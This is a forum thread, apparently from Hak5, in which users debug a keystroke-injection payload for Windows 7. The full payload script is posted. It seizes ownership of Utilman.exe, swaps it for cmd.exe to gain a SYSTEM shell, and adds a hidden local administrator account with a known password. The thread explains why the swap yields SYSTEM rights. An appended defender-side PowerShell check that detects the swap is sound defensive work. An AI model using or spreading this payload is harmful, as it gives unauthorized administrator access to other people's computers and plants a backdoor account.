mackwage Posted October 5, 2011

I seem to have issues with the payload as is. The issue seems to be with the below lines:

MENU
STRING a
ENTER

I assume this is to right click on the CMD exe and run as administrator. However it seems to right click within the text box of the start menu. Does anyone else have this issue?
Darren Kitchen Posted October 5, 2011

I haven't seen that behavior, but I'd say a DELAY between MENU and STRING a are in order for sure. That might be the issue in fact.
Xcellerator Posted October 5, 2011

If that fix works, I'll change it on the Wiki as well. Thanks for the heads up. Also, I'm sure a few of the other delays could be removed depending on the speed of the computer you are using...
mackwage Posted October 5, 2011

I think it's the actual behavior of Windows. If you manually hit the Windows key, type cmd then hit shift f10, it does the same behavior.
mackwage Posted October 5, 2011

Minus the above thing, I had to change the syntax of some of the commands to get it to work on Windows 7... specifically the icacls, ren, rmdir commands. As it was, it would prompt for an answer to the ren and rmdir commands so I added the trigger to suppress those. Also, I had to change the icacls syntax to allow full control of Utilman.exe. Then I added a short delay after each GUI command.

DELAY 200
GUI r
DELAY 50
STRING cmd
DELAY 50
ENTER
DELAY 50
STRING takeown /f "%systemroot%\System32\Utilman.exe"
ENTER
DELAY 50
STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
ENTER
DELAY 50
STRING cd %systemroot%\System32
ENTER
DELAY 50
STRING mkdir util
ENTER
STRING xcopy cmd.exe util\
ENTER
DELAY 50
STRING ren Utilman.exe Utilman.exe.bak
ENTER
DELAY 50
STRING cd /util
ENTER
DELAY 50
STRING ren cmd.exe Utilman.exe
ENTER
DELAY 50
STRING cd ..
ENTER
DELAY 50
STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\
ENTER
DELAY 50
STRING rmdir /s /q util
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
GUI u
STRING net user Local000 /add
ENTER
DELAY 50
STRING net localgroup administrators Local000 /add
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
GUI r
STRING cmd
ENTER
DELAY 50
STRING cd "%systemroot%\System32"
ENTER
DELAY 50
STRING delete Utilman.exe
ENTER
DELAY 50
STRING y
ENTER
DELAY 50
STRING ren Utilman.exe.bak Utilman.exe
ENTER
DELAY 50
STRING exit
ENTER
GUI r
DELAY 500
STRING cmd
DELAY 500
ENTER
DELAY 200
STRING net user Local000 *
ENTER
STRING hak5
ENTER
STRING hak5
ENTER
STRING exit
ENTER
Xcellerator Posted October 5, 2011

What version of Windows 7 did you run this on? I ran all the commands on Windows 7 Home Premium 64-Bit and they worked perfectly. Also, you may find it easier to add the "DEFAULT_DELAY" command to the start of the script. I will append those changes to the Wiki, as well.
mackwage Posted October 5, 2011

Thanks for the tip on the default delay. I am using Win7 Ultimate x64. I manually walked through every step of the script and typed the commands in CMD to view their behavior.

icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T

This command didn't actually seem to change the permissions unless adding the "/grant administrators:F /T". I did some Google searching on the command to understand more how it works, which led to me adding the last part.

STRING xcopy cmd.exe util\

I changed the syntax and added a backslash at the end. Without the backslash at the end, xcopy will prompt and ask if it's a file or a directory.

STRING cd /util
STRING ren cmd.exe Utilman.exe
STRING cd ..

I had trouble getting the rename command to interact correctly with the file unless that file was in my working directory.

STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\

I couldn't get xcopy to successfully copy from the util folder to the parent directory. I tried all sorts of variations and kept getting errors. So I just used the absolute path name instead.

STRING rmdir /s /q util

Without the /q trigger, rmdir will prompt you asking if you are sure you wish to delete it.

I'm also looking for the correct icacls command to change Utilman.exe back to the default permissions at the end of the script. Pwning the machine or not, I'd hate to leave it vulnerable for someone else to play with. :P
Xcellerator Posted October 5, 2011

Well, that's great. I updated the wiki and also found that just by using xcopy util\Utilman.exe \/ seemed to work.
wdbarker Posted April 20, 2014

What is the purpose of all the utilman.exe machinations? Once you have the administrator mode cmd prompt, running the net user (create), net localgroup and net user (password) work directly. No footprints to clean up, and the same effect. The only use for utilman.exe I've found involves getting a cmd prompt with no logon at all, and your script presupposes a logged on user - with admin privs - that can do the three target commands in the first window.
Xcellerator Posted April 20, 2014

The difference is that utilman.exe runs as SYSTEM, not local admin. That means it has higher privileges than the standard local administrator account.
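For anyone auditing a machine rather than running the payload, here is a defender-side check, added to this thread and not from any of the posters or the Hak5 wiki, that looks for the traces the script above leaves behind: Utilman.exe swapped for a byte-identical copy of cmd.exe, ownership moved off TrustedInstaller by takeown, an explicit FullControl grant to Administrators from icacls, and the Utilman.exe.bak and util\ leftovers. It also prints (rather than runs) the commands that put the file and its ownership back, which is the question mackwage raised earlier about restoring the default permissions. It assumes an elevated PowerShell 5.1 or later session on a stock Windows install; the function name Test-UtilmanIntegrity is my own.

```powershell
# Added example, not part of the thread: audit %SystemRoot%\System32\Utilman.exe
# for the artifacts the payload above leaves. Run from an elevated PowerShell session.
# Test-UtilmanIntegrity is an assumed helper name; the paths are the standard ones.
function Test-UtilmanIntegrity {
    $sys32    = Join-Path $env:SystemRoot 'System32'
    $utilman  = Join-Path $sys32 'Utilman.exe'
    $cmdExe   = Join-Path $sys32 'cmd.exe'
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. The payload copies cmd.exe over Utilman.exe, so the two hashes become identical.
    $hUtil = (Get-FileHash -Algorithm SHA256 -Path $utilman).Hash
    $hCmd  = (Get-FileHash -Algorithm SHA256 -Path $cmdExe).Hash
    if ($hUtil -eq $hCmd) {
        $findings.Add('Utilman.exe has the same SHA256 as cmd.exe (binary swapped)')
    }

    # 2. "takeown /f" moves ownership from TrustedInstaller to the Administrators group.
    $acl = Get-Acl -Path $utilman
    if ($acl.Owner -notlike '*TrustedInstaller*') {
        $findings.Add("Owner is '$($acl.Owner)', expected NT SERVICE\TrustedInstaller")
    }

    # 3. "icacls ... /grant administrators:F" adds a FullControl ACE for Administrators;
    #    the stock ACL on System32 binaries gives that group only ReadAndExecute.
    foreach ($ace in $acl.Access) {
        if ($ace.IdentityReference.Value -like '*\Administrators' -and
            $ace.AccessControlType -eq 'Allow' -and
            $ace.FileSystemRights.HasFlag([System.Security.AccessControl.FileSystemRights]::FullControl)) {
            $findings.Add("Explicit FullControl ACE for $($ace.IdentityReference.Value)")
        }
    }

    # 4. Leftovers from the ren/xcopy steps: Utilman.exe.bak and the util\ staging folder.
    foreach ($leftover in @("$utilman.bak", (Join-Path $sys32 'util'))) {
        if (Test-Path -LiteralPath $leftover) {
            $findings.Add("Leftover artifact: $leftover")
        }
    }

    return $findings
}

$result = Test-UtilmanIntegrity
if ($result.Count -eq 0) {
    Write-Output 'Utilman.exe looks intact.'
} else {
    $result | ForEach-Object { Write-Output "FINDING: $_" }
    # Remediation is printed, not executed, so the operator reviews it first.
    # sfc restores the protected binary from the component store; icacls hands
    # ownership back to TrustedInstaller.
    Write-Output ''
    Write-Output 'Suggested remediation (review, then run elevated):'
    Write-Output "  sfc /scanfile=$env:SystemRoot\System32\Utilman.exe"
    Write-Output "  icacls `"$env:SystemRoot\System32\Utilman.exe`" /setowner `"NT SERVICE\TrustedInstaller`""
}
```

The hash comparison is the strongest signal, because a catalog-signed copy of cmd.exe still carries a valid Authenticode status and would not be caught by a signature check alone. Since the payload also creates a local account and puts it in Administrators, a review of that group (net localgroup administrators) belongs alongside this file check.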